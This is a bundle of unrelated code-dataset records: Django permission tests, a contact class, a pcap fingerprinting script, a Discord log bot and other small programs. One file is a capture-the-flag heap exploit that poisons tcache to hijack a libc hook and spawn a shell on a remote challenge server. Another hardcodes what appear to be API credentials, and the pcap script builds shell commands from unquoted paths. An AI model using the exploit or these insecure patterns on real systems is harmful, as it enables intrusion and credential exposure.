submission_account_id='Webin-000',\n biome=_biome)\n baker.make(\"emgapi.Study\", pk=112, secondary_accession=\"SRP0112\",\n is_public=1, submission_account_id='Webin-000',\n biome=_biome)\n # Webin-000 private\n baker.make(\"emgapi.Study\", pk=113, secondary_accession=\"SRP0113\",\n is_public=0, submission_account_id='Webin-000',\n biome=_biome)\n\n # Webin-111 public\n baker.make(\"emgapi.Study\", pk=114, secondary_accession=\"SRP0114\",\n is_public=1, submission_account_id='Webin-111',\n biome=_biome)\n # Webin-111 private\n baker.make(\"emgapi.Study\", pk=115, secondary_accession=\"SRP0115\",\n is_public=0, submission_account_id='Webin-111',\n biome=_biome)\n\n # unknown public\n baker.make(\"emgapi.Study\", pk=120, secondary_accession=\"SRP0120\",\n is_public=1, submission_account_id=None, biome=_biome)\n # unknown private\n baker.make(\"emgapi.Study\", pk=121, secondary_accession=\"SRP0121\",\n is_public=0, submission_account_id=None, biome=_biome)\n\n @pytest.mark.parametrize(\n 'view, username, count, ids, bad_ids',\n [\n # private\n ('emgapi_v1:studies-list', 'Webin-111', 5,\n ['MGYS00000111', 'MGYS00000112', 'MGYS00000114', 'MGYS00000115',\n 'MGYS00000120'],\n ['MGYS00000113', 'MGYS00000121']),\n # mydata\n ('emgapi_v1:mydata-list', 'Webin-111', 2,\n ['MGYS00000114', 'MGYS00000115'],\n []),\n # public\n ('emgapi_v1:studies-list', None, 4,\n ['MGYS00000111', 'MGYS00000112', 'MGYS00000114', 'MGYS00000120'],\n ['MGYS00000113', 'MGYS00000115', 'MGYS00000121']),\n ]\n )\n def test_list(self, apiclient, view, username, count, ids, bad_ids):\n auth = None\n if username is not None:\n data = {\n \"username\": username,\n \"password\": \"secret\",\n }\n rsp = apiclient.post(\n reverse('obtain_jwt_token_v1'), data=data, format='json')\n token = rsp.json()['data']['token']\n auth = 'Bearer {}'.format(token)\n\n url = reverse(view)\n if auth is not None:\n response = apiclient.get(url, HTTP_AUTHORIZATION=auth)\n else:\n response = apiclient.get(url)\n assert response.status_code == status.HTTP_200_OK\n rsp = response.json()\n\n # Meta\n assert 
rsp['meta']['pagination']['page'] == 1\n assert rsp['meta']['pagination']['pages'] == 1\n assert rsp['meta']['pagination']['count'] == count\n\n # Data\n assert len(rsp['data']) == count\n assert set(ids) - set([d['id'] for d in rsp['data']]) == set()\n\n ids.extend(bad_ids)\n assert set(ids) - set([d['id'] for d in rsp['data']]) == set(bad_ids)\n\n def test_detail(self, apiclient):\n data = {\n \"username\": \"Webin-000\",\n \"password\": \"secret\",\n }\n rsp = apiclient.post(\n reverse('obtain_jwt_token_v1'), data=data, format='json')\n token = rsp.json()['data']['token']\n\n url = reverse(\"emgapi_v1:studies-detail\", args=['SRP0113'])\n response = apiclient.get(\n url, HTTP_AUTHORIZATION='Bearer {}'.format(token))\n assert response.status_code == status.HTTP_200_OK\n rsp = response.json()\n\n assert rsp['data']['id'] == 'MGYS00000113'\n\n url = reverse(\"emgapi_v1:studies-detail\", args=['MGYS00000115'])\n response = apiclient.get(\n url, HTTP_AUTHORIZATION='Bearer {}'.format(token))\n assert response.status_code == status.HTTP_404_NOT_FOUND\n\n url = reverse(\"emgapi_v1:studies-detail\", args=['MGYS00000121'])\n response = apiclient.get(\n url, HTTP_AUTHORIZATION='Bearer {}'.format(token))\n assert response.status_code == status.HTTP_404_NOT_FOUND\n\n @pytest.mark.parametrize('accession', [\n 'MGYS00000113', 'MGYS00000115', 'MGYS00000121',\n 'SRP0113', 'SRP0115', 'SRP0121'\n ])\n def test_not_found(self, apiclient, accession):\n url = reverse(\"emgapi_v1:studies-detail\", args=[accession])\n response = apiclient.get(url)\n assert response.status_code == status.HTTP_404_NOT_FOUND\n","sub_path":"tests/api/test_permissions.py","file_name":"test_permissions.py","file_ext":"py","file_size_in_byte":5652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"243441747","text":"import class_utils\n\n\nclass ContactUtils:\n # EXCLUDED_MERGE_ATTRIBUTES: All Contact attributes we don't want to use when merging two or more Contact objects.\n EXCLUDED_MERGE_ATTRIBUTES = ['prefix', 'name', 'first_name', 'last_name', 'suffix', 'nickname', 'company', 'job_title',\n 'birthday', 'gender', 'relationship', 'notes']\n LIST_ATTRIBUTES = ['company', 'job_title']\n\n def __init__(self):\n pass\n\n\nclass Contact:\n\n def __init__(self):\n self.contact_id = -1\n self.prefix = \"\"\n self.name = \"\"\n self.first_name = \"\"\n self.last_name = \"\"\n self.suffix = \"\"\n self.nickname = \"\"\n self.birthday = \"\"\n self.gender = \"\"\n self.relationship = \"\"\n self.company = []\n self.job_title = []\n self.email = []\n self.phone = []\n self.addresses = []\n self.notes = []\n self.website = []\n self.twitter = []\n self.linkedin = []\n self.facebook = []\n self.instagram = []\n\n def __hash__(self):\n hash_code = 0\n if self.company and len(self.company) > 0:\n for company in self.company:\n hash_code += hash(company)\n\n if self.job_title and len(self.job_title) > 0:\n for job_title in self.job_title:\n hash_code += hash(job_title)\n\n if self.email and len(self.email) > 0:\n for email in self.email:\n hash_code += hash(email)\n\n if self.phone and len(self.phone) > 0:\n for phone in self.phone:\n hash_code += hash(phone)\n\n if self.addresses and len(self.addresses) > 0:\n for address in self.addresses:\n hash_code += hash(address)\n\n if self.notes and len(self.notes) > 0:\n for note in self.notes:\n hash_code += hash(note)\n\n if self.website and len(self.website) > 0:\n for website in self.website:\n hash_code += hash(website)\n\n if self.twitter and 
len(self.twitter) > 0:\n for twitter in self.twitter:\n hash_code += hash(twitter)\n\n if self.linkedin and len(self.linkedin) > 0:\n for linkedin in self.linkedin:\n hash_code += hash(linkedin)\n\n if self.facebook and len(self.facebook) > 0:\n for facebook in self.facebook:\n hash_code += hash(facebook)\n\n if self.instagram and len(self.instagram) > 0:\n for instagram in self.instagram:\n hash_code += hash(instagram)\n\n hash_code += hash(self.contact_id)\n hash_code += hash(self.prefix)\n hash_code += hash(self.name)\n hash_code += hash(self.first_name)\n hash_code += hash(self.last_name)\n hash_code += hash(self.suffix)\n hash_code += hash(self.nickname)\n hash_code += hash(self.birthday)\n hash_code += hash(self.gender)\n\n return hash_code\n\n @classmethod\n def init_from_icloud_csv_row(cls, row):\n cls.prefix = row.get('Name Prefix', '')\n cls.name = row.get('Name', '')\n cls.first_name = row.get('Given Name', '')\n cls.last_name = row.get('Family Name', '')\n cls.suffix = row.get('Name Suffix', '')\n cls.nickname = row.get('Nickname', '')\n cls.birthday = row.get('Birthday', '')\n cls.gender = row.get('Gender', '')\n\n cls.company = []\n\n if row.get('Organization Name', ''):\n cls.company.append(row.get('Organization Name', ''))\n\n cls.website = []\n\n if row.get('Website 1 - Value', ''):\n cls.website.append(row.get('Website 1 - Value', ''))\n\n cls.email = []\n\n if row.get('Email 1 - Value', ''):\n cls.email.append(row['Email 1 - Value'])\n\n if row.get('Email 2 - Value', ''):\n cls.email.append(row['Email 2 - Value'])\n\n if row.get('Email 3 - Value', ''):\n cls.email.append(row['Email 3 - Value'])\n\n cls.phone = []\n\n if row.get('Phone 1 - Value', ''):\n cls.phone.append(row['Phone 1 - Value'])\n\n if row.get('Phone 2 - Value', ''):\n cls.phone.append(row['Phone 2 - Value'])\n\n if row.get('Phone 3 - Value', ''):\n cls.phone.append(row['Phone 3 - Value'])\n\n cls.addresses = []\n\n if row.get('Address 1 - Value', ''):\n cls.addresses.append(row['Address 1 - Value'])\n\n cls.contact_id = hash(cls)\n return cls\n\n @classmethod\n def init_from_apple_vcard(cls, vcard):\n cls.name = vcard.get('fn', '')\n cls.birthday = vcard.get('bday', '')\n\n cls.phone = []\n\n if vcard.get('tel'):\n cls.phone.append(vcard.get('tel'))\n\n cls.email = []\n\n if vcard.get('email'):\n cls.email.append(vcard.get('email'))\n\n cls.notes = []\n\n if vcard.get('note'):\n cls.notes.append(vcard.get('note'))\n\n cls.job_title = []\n\n if vcard.get('title'):\n cls.job_title.append(vcard.get('title'))\n\n cls.website = []\n\n if vcard.get('url'):\n cls.website.append(vcard.get('url'))\n\n cls.contact_id = hash(cls)\n\n return cls\n\n @classmethod\n def init_from_merging_two_contacts(cls, c1, c2):\n # TODO: How do we handle two contacts having different values for the same param?\n # TODO: Create method to handle choosing an attribute value from one of the Contact objects.\n attributes = class_utils.get_class_attributes(Contact())\n new_c = Contact()\n\n # Go through each attribute for Contact, and set with a value.\n for attribute in attributes:\n # Neither Contact() object has this attribute, skip it\n if not class_utils.is_one_class_with_attribute(c1, c2, attribute):\n continue\n\n # Both Contact() objects have this attribute,\n # we'll append unique values from lists, and compare strings for likeness.\n # Each attribute type should have its own validator, but for now, we'll just choose whichever string has\n # multiple strings.\n # TODO: give each attribute its own validator/selector 
method\n if class_utils.both_classes_have_none_null_attributes(c1, c2, attribute):\n # TODO: figure out how to handle this case\n # String vs List\n continue\n pass\n\n # Only one of Contact() objects have this attribute, so we'll figure out which one and use it's value.\n setattr(new_c, attribute, class_utils.get_attribute_from_class(c1, c2, attribute))\n\n new_c.contact_id = hash(new_c)\n return new_c\n","sub_path":"contact.py","file_name":"contact.py","file_ext":"py","file_size_in_byte":6747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"358537763","text":"#! /usr/bin/env python3\n\nimport sys\n\ndict_input = sys.argv[1:]\n\ninput_dict = {}\n\nfor i in range(len(dict_input)):\n temp_input = dict_input[i].split(':')\n# print(temp_input)\n input_dict[temp_input[0]] = temp_input[1]\n\nfor key,value in input_dict.items():\n print('ID:',key,'Name:',value)\n \n\n\n\n\n\n\n\n","sub_path":"test/dicttest1.py","file_name":"dicttest1.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"105903799","text":"import datetime\nimport json\nimport os\nimport sys\nimport time\n\nimport pika\nimport redis\n\n\ndef connect_rabbit(host='messenger', port=5672, queue='task_queue'):\n params = pika.ConnectionParameters(host=host, port=port)\n connection = pika.BlockingConnection(params)\n channel = connection.channel()\n channel.queue_declare(queue=queue, durable=True)\n return channel\n\ndef send_rabbit_msg(msg, channel, exchange='', routing_key='task_queue'):\n channel.basic_publish(exchange=exchange,\n routing_key=routing_key,\n body=json.dumps(msg),\n properties=pika.BasicProperties(\n delivery_mode=2,\n ))\n print(\" [X] %s UTC %r %r\" % (str(datetime.datetime.utcnow()),\n str(msg['id']), str(msg['file_path'])))\n return\n\ndef get_version():\n version = ''\n with open('VERSION', 'r') as f:\n for line in f:\n version = line.strip()\n return version\n\ndef run_p0f(path):\n os.system('/usr/bin/p0f -r ' + path + ' -o /tmp/p0f_output.txt > /dev/null')\n return\n\ndef run_tshark(path):\n os.system('/usr/bin/tshark -r ' + path + ' -T fields -e ip.src -e eth.src | sort | uniq > /tmp/tshark_output.txt')\n os.system('/usr/bin/tshark -r ' + path + ' -T fields -e ip.dst -e eth.dst | sort | uniq >> /tmp/tshark_output.txt')\n return\n\ndef parse_output():\n results = {}\n with open('/tmp/p0f_output.txt', 'r') as f:\n for line in f:\n l = \" \".join(line.split()[2:])\n l = l.split('|')\n if l[0] == 'mod=syn':\n results[l[1].split('cli=')[1].split('/')[0]] = {'full_os': l[4].split('os=')[1], 'short_os': l[4].split('os=')[1].split()[0]}\n with open('/tmp/tshark_output.txt', 'r') as f:\n for line in f:\n pair = line.split()\n if len(pair) == 2:\n if pair[0] in results:\n results[pair[0]]['mac'] = pair[1]\n return results\n\ndef connect():\n r = None\n try:\n r = redis.StrictRedis(host='redis', port=6379, db=0)\n except Exception as e: # pragma: no cover\n try:\n r = redis.StrictRedis(host='localhost', port=6379, db=0)\n except Exception as e: # pragma: no cover\n print('Unable to connect to redis because: ' + str(e))\n return r\n\ndef save(r, results):\n timestamp = str(int(time.time()))\n if r:\n try:\n if isinstance(results, list):\n for result in results:\n for key in result:\n redis_k = {}\n for k in result[key]:\n redis_k[k] = str(result[key][k])\n r.hmset(key, redis_k)\n r.hmset('p0f_'+timestamp+'_'+key, redis_k)\n r.sadd('ip_addresses', key)\n 
r.sadd('p0f_timestamps', timestamp)\n elif isinstance(results, dict):\n for key in results:\n redis_k = {}\n for k in results[key]:\n redis_k[k] = str(results[key][k])\n r.hmset(key, redis_k)\n r.hmset('p0f_'+timestamp+'_'+key, redis_k)\n r.sadd('ip_addresses', key)\n r.sadd('p0f_timestamps', timestamp)\n except Exception as e: # pragma: no cover\n print('Unable to store contents of p0f: ' + str(results) +\n ' in redis because: ' + str(e))\n return\n\ndef main():\n pcap_paths = []\n path = sys.argv[1]\n if os.path.isdir(path):\n for root, dirs, files in os.walk(path):\n for file in files:\n if file.endswith(\".pcap\") or file.endswith(\".pcapng\") or file.endswith(\".dump\") or file.endswith(\".capture\"):\n pcap_paths.append(os.path.join(root, file))\n else:\n pcap_paths.append(path)\n\n for path in pcap_paths:\n run_p0f(path)\n run_tshark(path)\n results = parse_output()\n print(results)\n\n if 'redis' in os.environ and os.environ['redis'] == 'true':\n r = connect()\n save(r, results)\n\n uid = ''\n if 'id' in os.environ:\n uid = os.environ['id']\n if 'rabbit' in os.environ and os.environ['rabbit'] == 'true':\n try:\n channel = connect_rabbit()\n body = {'id': uid, 'type': 'metadata', 'file_path': path, 'data': results, 'results': {'tool': 'p0f', 'version': get_version()}}\n send_rabbit_msg(body, channel)\n body = {'id': uid, 'type': 'metadata', 'file_path': path, 'data': '', 'results': {'tool': 'p0f', 'version': get_version()}}\n send_rabbit_msg(body, channel)\n except Exception as e:\n print(str(e))\n return\n\nif __name__ == \"__main__\": # pragma: no cover\n main()\n","sub_path":"p0f/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"598383629","text":"import re\n\ndef sentence_spliter(file_name):\n input_text = re.sub(r\"^\\n\", \"\", open(file_name, encoding=\"utf8\").read())\n chr_list = list(input_text)\n s_start = 0\n for match in re.finditer(r\"([.;:?!]) ([A-Z])\", input_text):\n s_end = match.start()\n edit_text = chr_list[s_start:s_end+1] + [\"\\n\"]\n s_start = s_end + 2\n yield \"\".join(edit_text)\n\nif __name__ == \"__main__\":\n for sentence in sentence_spliter(\"nlp.txt\"):\n print(sentence)","sub_path":"hirao/chapter06/knock50.py","file_name":"knock50.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"517301311","text":"class Person:\n def __init__(self, name, age):\n self.__name = name\n self.age = age\n\n def growUp(self) ->int:# this int is only a hint, equivalent to a comment\n self.age += 1\n return self.__name + \":我长大啦一岁!\"\n\n def __str__(self):\n return self.__name + \":\" + str(self.age)\n\n\np1 = Person(\"riguang\", 22)\nprint(p1)\nmsg = p1.growUp()\nprint(msg)\nprint(p1)\nprint(p1.age)\n","sub_path":"Python_Study/class_study.py","file_name":"class_study.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"564139910","text":"from behave import *\nfrom pyhabit import hrpg\n\nuse_step_matcher(\"re\")\n\n@given(\"I just reset my account\")\ndef step_impl(context):\n context.user = hrpg.User('0ae9d6b0-c729-4533-bfe1-ac22209eb93e',\n 'd3edcc7c-27b9-435d-91a0-e19706430413')\n context.user.reset( 
)","sub_path":"pyhabit/tests/steps/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"29450888","text":"from pwn import *\n\nio=remote('pynotes.darkarmy.xyz',32769)\n\n\n#io = process(\"./a.out\",env={\"LD_PRELOAD\":\"./libc.so.6\"})\n\nre = lambda a: io.recv(a)\nru = lambda a: io.recvuntil(a)\nrl = lambda : io.recvline()\ns = lambda a: io.send(a)\nsl = lambda a: io.sendline(a)\nsla= lambda a,b: io.sendlineafter(a,b)\nsa = lambda a,b: io.sendafter(a,b)\n\n\n#gdb.attach(io)\n#io.interactive()\n\n\n#\"\"\"\nif __name__ == '__main__':\n sla('\\n','new(0,0x80,1234)')\n for i in range(1,9):\n sl('new(' + str(i) + ',0x80,1234)')\n sl(\"new(9,10,12345)\")\n for i in range(9):\n sl('delete(' + str(i) + ')')\n sl('leak = view(8)')\n sl('leak=leak-4111520')\n sl('binsh = 0x0068732f6e69622f')\n sl('fun = leak + 0x4f4e0')\n sl('hook = leak + 0x3ed8e8')\n sl(\"new(0,0x60,12345)\")\n sl(\"print(leak)\")\n sl(\"print(hook)\")\n sl(\"delete(0)\")\n sl(\"delete(0)\")\n sl(\"delete(0)\")\n sl(\"new(2,0x60,hook)\")\n sl(\"new(3,0x60,binsh)\")\n sl(\"new(4,0x60,fun)\")\n sl(\"print(view(4))\")\n sl(\"delete(3)\")\n sl(\"DARKCTF\")\n io.interactive()\n#\"\"\"\n","sub_path":"dark20/pynote/distribute/share/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"336903290","text":"try:\n from api import ApiVK\nexcept ImportError:\n from api.photos.vk.api import ApiVK\n\n\nclass ExtractorVK:\n def __init__(self, api=ApiVK()):\n if not isinstance(api, ApiVK):\n raise NotImplementedError\n self.api = api\n\n def get_photos(self, user_id: int, **params):\n method = 'photos.get'\n default_params = {\n 'album_id': 'profile',\n 'extended': 1,\n 'owner_id': user_id,\n **params\n }\n\n content = self.api.get(method, **default_params).json()\n if 'error' in content:\n raise ValueError(f'Некорректные данные запроса фотографии: {content[\"error\"]}')\n return content\n\n\nif __name__ == \"__main__\":\n params = {\n 'album_id': 'profile',\n }\n extractor = ExtractorVK()\n print(extractor.get_photos(552934290, **params))\n","sub_path":"api/photos/vk/extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"422259017","text":"#!/usr/bin/env python3\n\nimport discord, sys, traceback, io, os, asyncio, re\nfrom bot_utils import setup, send_msg\nfrom datetime import datetime, timedelta\nfrom subprocess import Popen, PIPE\n\n\"\"\"\nlog-checker checks the docker logs for siad.\n\nArguments:\n 1. path to a .env file (default is none so env variables can already be\n preset)\n\n 2. docker container name (default: \"sia\")\n\n 3. number of hours to look back in log (default: 1 hour)\n\n\"\"\"\n\n# Get the container name as an argument or use \"sia\" as default.\nCONTAINER_NAME = \"sia\"\nif len(sys.argv) > 2:\n CONTAINER_NAME = sys.argv[2]\n\n# Get the number of hours to look back in the logs or use 1 as default.\nCHECK_HOURS = 1\nif len(sys.argv) > 3:\n CHECK_HOURS = int(sys.argv[3])\n\n# Discord messages have a limit on their length set at 2000 bytes. We use 
We use\n# a lower limit in order to leave some space for additional message text.\nDISCORD_MAX_MESSAGE_LENGTH = 1900\n\nbot_token = setup()\nclient = discord.Client()\n\n\n# exit_after kills the script if it hasn't exited on its own after `delay` seconds\nasync def exit_after(delay):\n await asyncio.sleep(delay)\n os._exit(0)\n\n\n@client.event\nasync def on_ready():\n await run_checks()\n asyncio.create_task(exit_after(3))\n\n\nasync def run_checks():\n print(\"Running Skynet portal log checks\")\n try:\n await check_load_average()\n await check_docker_logs()\n\n except: # catch all exceptions\n trace = traceback.format_exc()\n await send_msg(client, \"```\\n{}\\n```\".format(trace), force_notify=False)\n\n\n# check_load_average monitors the system's load average value and issues a\n# warning message if it exceeds 10.\nasync def check_load_average():\n uptime_string = os.popen(\"uptime\").read().strip()\n # pattern = \"\"\n if sys.platform == \"Darwin\":\n pattern = \"^.*load averages: \\d*\\.\\d* \\d*\\.\\d* (\\d*\\.\\d*)$\"\n else:\n pattern = \"^.*load average: \\d*\\.\\d*, \\d*\\.\\d*, (\\d*\\.\\d*)$\"\n load_av = re.match(pattern, uptime_string).group(1)\n if float(load_av) > 10:\n await send_msg(client, \"High system load detected: `uptime: {}`\".format(uptime_string), force_notify=True)\n\n# check_docker_logs checks the docker logs by filtering on the docker image name\nasync def check_docker_logs():\n print(\"\\nChecking docker logs...\")\n\n now = datetime.now()\n time = now - timedelta(hours=CHECK_HOURS)\n time_string = \"{}h\".format(CHECK_HOURS)\n\n # Read the logs.\n print(\"[DEBUG] Will run `docker logs --since {} {}`\".format(time_string, CONTAINER_NAME))\n proc = Popen([\"docker\", \"logs\", \"--since\", time_string, CONTAINER_NAME], stdin=PIPE, stdout=PIPE, stderr=PIPE, text=True)\n std_out, std_err = proc.communicate()\n\n if len(std_err) > 0:\n # Trim the error log to under 1MB.\n one_mb = 1024*1024\n if len(std_err) > one_mb:\n pos = std_err.find(\"\\n\", -one_mb)\n std_err = std_err[pos+1:]\n upload_name = \"{}-{}-{}-{}-{}:{}:{}_err.log\".format(CONTAINER_NAME, time.year, time.month, time.day, time.hour, time.minute, time.second)\n await send_msg(client, \"Error(s) found in log!\", file=discord.File(io.BytesIO(std_err.encode()), filename=upload_name), force_notify=True)\n # Send at most DISCORD_MAX_MESSAGE_LENGTH characters of logs, rounded\n # down to the nearest new line. This is a limitation in the size of\n # Discord messages - they can be at most 2000 characters long (and we\n # send some extra characters before the error log).\n if len(std_err) > DISCORD_MAX_MESSAGE_LENGTH:\n pos = std_err.find(\"\\n\", -DISCORD_MAX_MESSAGE_LENGTH)\n std_err = std_err[pos+1:]\n await send_msg(client, \"Error(s) preview:\\n{}\".format(std_err), force_notify=True)\n return\n\n # If there are any critical or severe errors. 
upload the whole log file.\n if 'Critical' in std_out or 'Severe' in std_out or 'panic' in std_out:\n upload_name = \"{}-{}-{}-{}-{}:{}:{}.log\".format(CONTAINER_NAME, time.year, time.month, time.day, time.hour, time.minute, time.second)\n await send_msg(client, \"Critical or Severe error found in log!\", file=discord.File(io.BytesIO(std_out.encode()), filename=upload_name), force_notify=True)\n return\n\n # No critical or severe errors, return a heartbeat type message\n pretty_before = time.strftime(\"%I:%M%p\")\n pretty_now = now.strftime(\"%I:%M%p\")\n await send_msg(client, \"No critical or severe warnings in log from `{}` to `{}`\".format(pretty_before, pretty_now))\n\n\nclient.run(bot_token)\n","sub_path":"setup-scripts/log-checker.py","file_name":"log-checker.py","file_ext":"py","file_size_in_byte":4530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"468936032","text":"# Import required libraries\nimport os\nimport pickle\nimport copy\nimport datetime as dt\nimport math\n\nimport requests\nimport pandas as pd\nfrom flask import Flask\nimport dash\nimport dash_daq as daq\nimport dash_table\nfrom dash.dependencies import Input, Output, State\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\nimport plotly.graph_objs as go\nimport dash_dangerously_set_inner_html\nimport numpy as np\nimport os\nfrom os import path\n\nfrom model.base_model import *\n\n \nexternal_styles = [\n{\n \"href\": \"https://fonts.googleapis.com/css2?family=Open+Sans+Condensed:ital,wght@0,300;0,700;1,300&display=swap\",\n \"rel\": \"stylesheet\"\n},\n\n{\n \"href\": \"https://fonts.googleapis.com/css2?family=Noto+Sans+JP:wght@100;300;400;500;700;900&display=swap\",\n \"rel\": \"stylesheet\"\n},\n\n{\n \"href\": \"https://fonts.googleapis.com/css2?family=Ubuntu&display=swap\",\n \"rel\": \"stylesheet\"\n}\n\n]\n\napp = dash.Dash(__name__, external_stylesheets=external_styles)\nserver = app.server\napp.title = \"COVID-19 PIP\"\n\nPOP_UP = app.get_asset_url(\"transparent_PIP_logo.png\") \n\n# Define theme color codes\n\nLIGHT_PINK = \"#FF60AA\"\nDARK_GRAY = \"#323232\"\nGRAY = \"#808080\"\nCYAN = \"#95E3FA\"\n\nPURPLE_COLOR = \"#AF1CF7\"\nDARK_PINK = \"#CA1A57\"\n\n#-------------------------------------------------------\n'''\nHelper functions for style formatting and data processing\n\nList of helper functions >>\n---------------------------\n_get_input_HTML_format :: returns cell formatting for \n html/dcc numerical input \n\n_get_radioItems_HTML_format :: returns a radio items \n list for display\n'''\n#-------------------------------------------------------\n\n# TO DO: Attack rate plot\n\n'''\nCOUNTRIES = [\"United States\", \"United Kingdom\", \"Italy\", \"Germany\", \"Spain\", \n \"Australia\", \"Brazil\", \"Canada\", \"Sweden\", \"Norway\", \"Finland\", \n \"Estonia\", \"Egypt\", \"Japan\", \"Croatia\"]\n'''\n\nCOUNTRIES = [\"United States\", \"United Kingdom\", \"Italy\", \"Germany\", \"Brazil\", \"Japan\", \"Egypt\"]\n\n# load models and data for all countries \n\nif path.exists(os.getcwd() + \"\\\\PIPmodels\\\\global_models\"):\n\n global_models = pickle.load(open(os.getcwd() + \"\\\\PIPmodels\\\\global_models\", 'rb'))\n\nelse:\n\n global_models = dict.fromkeys(COUNTRIES)\n\n for country in COUNTRIES:\n\n global_models[country] = pickle.load(open(os.getcwd() + \"\\\\2020-08-25\\\\models\\\\\" + country, 'rb'))\n\n pickle.dump(global_models, open(os.getcwd() + 
\"\\\\PIPmodels\\\\global_models\", 'wb'))\n\nif path.exists(os.getcwd() + \"\\\\PIPmodels\\\\country_data\"+\"_\"+str(dt.date.today())):\n\n country_data = pickle.load(open(os.getcwd() + \"\\\\PIPmodels\\\\country_data\"+\"_\"+str(dt.date.today()), 'rb'))\n\nelse:\n\n country_data = get_COVID_DELVE_data(COUNTRIES)\n\n pickle.dump(country_data, open(os.getcwd() + \"\\\\PIPmodels\\\\country_data\"+\"_\"+str(dt.date.today()), 'wb'))\n\n \nif path.exists(os.getcwd() + \"\\\\PIPmodels\\\\projections\"+\"_\"+str(dt.date.today())):\n\n global_projections = pickle.load(open(os.getcwd() + \"\\\\PIPmodels\\\\projections\"+\"_\"+str(dt.date.today()), 'rb'))\n\nelse:\n\n global_projections = dict.fromkeys(COUNTRIES)\n\n for country in COUNTRIES:\n\n global_projections[country] = pickle.load(open(os.getcwd() + \"\\\\2020-08-25\\\\projections\\\\\" + country, 'rb'))\n\n pickle.dump(global_projections, open(os.getcwd() + \"\\\\PIPmodels\\\\projections\"+\"_\"+str(dt.date.today()), 'wb'))\n\n\nTARGETS = [\"Daily Deaths\", \"Cumulative Deaths\", \"Reproduction Number\"]\n\nCOUNTRY_LIST = [{'label': COUNTRIES[k], 'value': COUNTRIES[k], \"style\":{\"margin-top\":\"-.3em\", \"align\": \"center\"}} for k in range(len(COUNTRIES))]\n\nTARGET_LIST = [{'label': TARGETS[k], 'value': k, \"style\":{\"margin-top\":\"-.3em\", \"align\": \"center\"}} for k in range(len(TARGETS))]\n\n\nBOX_SHADOW = \"1px 2px 3px 4px #ccc\" \nMARGIN_INPUT = \"20px\"\nPANEL_COLOR = \"#FBF8F8\"\n\nTITLE_STYLE = {\"marginBottom\": \".25em\", \"margin-top\": \"1em\", \"margin-left\": MARGIN_INPUT, \"color\":DARK_GRAY, \"font-weight\": \"bold\", \n \"font-size\": \"12\", \"font-family\": \"Noto Sans JP\"}\nSUBTITLE_STYLE = {\"color\":DARK_PINK, \"font-size\": 13}\nSUBTITLE_STYLE_ = {\"margin-top\":\"10px\", \"color\":DARK_PINK, \"font-size\": 13}\nPANEL_TEXT_STYLE = {\"marginBottom\": \".25em\", \"margin-top\": \"0em\", \"margin-left\": MARGIN_INPUT, \"color\":GRAY, \"font-size\": \"11px\", \n \"font-style\": \"italic\", \"font-family\":\"Noto Sans JP\"}\nPANEL_TEXT_STYLE2 = {\"marginBottom\": \".25em\", \"margin-top\": \"0em\", \"margin-left\": MARGIN_INPUT, \"color\":GRAY, \"font-size\": \"12px\", \n \"font-family\":\"Noto Sans JP\"}\nPANEL_TEXT_STYLE3 = {\"marginBottom\": \".25em\", \"margin-top\": \"0em\", \"margin-left\": MARGIN_INPUT, \"color\":GRAY, \"font-size\": \"12px\", \n \"font-family\":\"Noto Sans JP\", \"font-weight\":\"bold\"} \nPANEL_TEXT_STYLE4 = {\"marginBottom\": \".25em\", \"margin-top\": \"0em\", \"margin-left\": MARGIN_INPUT, \"margin-right\": MARGIN_INPUT, \"color\":GRAY, \n \"font-size\": \"12px\", \"font-family\":\"Noto Sans JP\", \"font-weight\":\"bold\"} \nPANEL_TEXT_STYLE_ = {\"marginBottom\": \"0em\", \"margin-top\": \"0em\", \"color\":DARK_GRAY, \"font-size\": \"13px\", \"font-family\":\"Open Sans Condensed\"}\n\nCAPTION_STYLE = {\"color\":\"#4E4646\", \"font-size\": 10}\nBULLET_STYLE_0 = {\"color\":\"#4E4646\", \"text-shadow\":\"#4E4646\", \"background-color\":\"#4E4646\", \"border-radius\": \"10%\", \"font-size\": 10, \"width\":\"7px\", \"margin-right\":\"10px\"}\nBULLET_STYLE_1 = {\"color\":\"#4F27EC\", \"text-shadow\":\"#4F27EC\", \"background-color\":\"#4F27EC\", \"border-radius\": \"10%\", \"font-size\": 10, \"width\":\"7px\", \"margin-right\":\"10px\"}\nBULLET_STYLE_2 = {\"color\":\"#AF1CF7\", \"text-shadow\":\"#AF1CF7\", \"background-color\":\"#AF1CF7\", \"border-radius\": \"10%\", \"font-size\": 10, \"width\":\"7px\", \"margin-right\":\"10px\"}\nBULLET_STYLE_3 = {\"color\":\"#F71C93\", \"text-shadow\":\"#F71C93\", \"background-color\":\"#F71C93\", 
